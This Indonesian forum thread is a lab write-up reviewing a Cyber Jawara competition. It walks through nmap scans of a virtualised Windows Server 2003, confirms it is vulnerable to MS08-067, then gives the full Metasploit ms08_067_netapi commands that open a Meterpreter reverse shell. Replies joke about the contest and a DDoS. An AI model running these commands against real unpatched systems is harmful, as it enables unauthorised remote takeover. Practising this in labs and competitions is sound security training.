MS08-067 win server 2003 [review cyber jawara kemarin]
#1
Ass.wr.wb.
mohon maaf baru sempet untuk share Big Grin. oke, mengingat betapa mudahnya exploit pada sesi pentest saat kompetisi kemarin, tapi apa boleh buat? PC host gw di remote dan di DDOS. jadi ya pasrah dah pas kemarin. ane share aja dah untuk yg selanjut nya di tahun depan memiliki kesempatan untuk ikut cyber jawara lagi. hehehe, langsung aja dah.

attacker operating system: backtrack 5 R2
address : 192.168.3.100
victim operating system : windows server 2003 (disamakan dengan keadaan win server pada saat kompetisi cyber kemarin)
address : 192.168.3.103 (vbox)

information gathering:
di tahap ini attacker mencari beberapa informasi tentang kelemahan yang terdapat pada victim.
Code:
root@404:~# nmap 192.168.3.103

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-25 06:00 WIT
Nmap scan report for 192.168.3.103
Host is up (0.017s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
[color=#FF0000]445/tcp open microsoft-ds[/color]
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1039/tcp open sbl
1040/tcp open netsaint
1048/tcp open neod2
1053/tcp open remote-as
1055/tcp open ansyslmd
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
MAC Address: 08:00:27:C3:C3:38 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds
lihat lah yg di beri warna merah, ternyata port 445 nya open alias terbuka. selanjutnya kita cari tahu versi smb brapakah yg terdapat pada windows server 2003 ini?
Code:
root@404:~# nmap --script=smb-check-vulns 192.168.3.103

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-25 06:06 WIT
Nmap scan report for 192.168.3.103
Host is up (0.014s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1039/tcp open sbl
1040/tcp open netsaint
1048/tcp open neod2
1053/tcp open remote-as
1055/tcp open ansyslmd
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
MAC Address: 08:00:27:C3:C3:38 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
| [color=#FF0000]MS08-067: VULNERABLE[/color]
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
telah diketahui versi smb nya adalah MS08-067. selanjutnya saya akan mencoba melakukan exploitasi terhadap windows server 2003 menggunakan metasploit, tentunya yang versi console.

exploitasi:
saat exploitasi menggunakan msfconsole
Code:
root@404:~# msfconsole

_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/

=[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 907 exploits - 493 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
=[ svn r15656 updated 6 days ago (2012.07.19)

msf >
lalu saya menggunakan exploit ms08_067_netapi

Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.3.103
RHOST => 192.168.3.103
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.3.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) >
lalu eksekusi exploit tadi dengan perintah "exploit -j"
Code:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.3.100:4444
msf exploit(ms08_067_netapi) > [*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP1 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.3.103
sessions -l[*] Meterpreter session 1 opened (192.168.3.100:4444 -> 192.168.3.103:1196) at 2012-07-25 06:14:16 +0700

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.168.3.100:4444 -> 192.168.3.103:1196 (192.168.3.103)

msf exploit(ms08_067_netapi) >
yap saya berhasil mendapatkan sessionsnya. untuk memilih session tinggal eksekusi dengan perintah
Code:
sessions -i 1

dan dapatlah sessions meterpreter. kemudian saya memasuki shell cmd dengan perintah "shell"
[Image: shell-server2003.png]

berikut terlihat dari sisi windows server 2003
[Image: desktop-server2003.png]

referensi from: http://koecroet.wordpress.com/
[shcode=This_site_xss-ed]

#2
wih mantap om kucrut, cb om cari lagi yg vulner"nya biar bisa dikembangkan Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#3
(07-25-2012, 10:07 AM)ekawithoutyou Wrote: wih mantap om kucrut, cb om cari lagi yg vulner"nya biar bisa dikembangkan Confused

maksud nya ?
[shcode=This_site_xss-ed]

#4
itu firewallnya nyala ngak?

#5
maksud ane cari vulner" port yg lain Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#6
kalo port 445 nya open brarti firewall gak aktif om Big Grin. makanya ane bilang itu review cyber jawara kemarin Smile. coz kmarin keadaan firewall harus non aktif
[shcode=This_site_xss-ed]

#7
ini diaaaa,,akhirnya rilis juga yaa Big Grin
ajiib nice post om Smile

#8
koecroet ga menerima kekalahan wkwkwk kita jadikan pelajaran yg indah yah ahahah nice croet Smile

#9
(07-25-2012, 02:14 PM)xsan-lahci Wrote: koecroet ga menerima kekalahan wkwkwk kita jadikan pelajaran yg indah yah ahahah nice croet Smile

bukan ga terima brur, cuma sare doank. terima ga terima juga sama aja wkwkwk
[shcode=This_site_xss-ed]

#10
oohh wkwkwk sing penting pengalamannya Smile yg ddos pas lomba ada niatan ddos dunia nyata ga nih wkwkwk






Users browsing this thread: 1 Guest(s)